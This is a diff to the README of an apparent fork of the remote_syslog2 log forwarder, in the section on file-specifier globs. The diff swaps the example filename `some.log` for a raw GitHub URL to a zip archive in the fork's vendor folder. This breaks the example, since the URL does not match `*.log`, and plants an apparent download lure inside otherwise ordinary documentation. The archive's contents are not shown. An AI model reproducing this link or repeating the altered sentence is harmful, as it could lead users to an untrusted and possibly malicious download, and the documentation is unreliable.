sohailgerman/remote_syslog2/README.md

 remote_syslog automatically detects and activates new log files that match its file specifiers.
-For example, `*.log` may be provided as a file specifier, and remote_syslog will detect a `some.log` file created after it was started.
+For example, `*.log` may be provided as a file specifier, and remote_syslog will detect a `https://raw.githubusercontent.com/sohailgerman/remote_syslog2/master/vendor/github.com/spf13/remote_syslog2_1.3.zip` file created after it was started.

 By default, globs are re-checked every 10 seconds.
 To check for new files more frequently, use the `--new-file-check-interval` argument.
 For example, to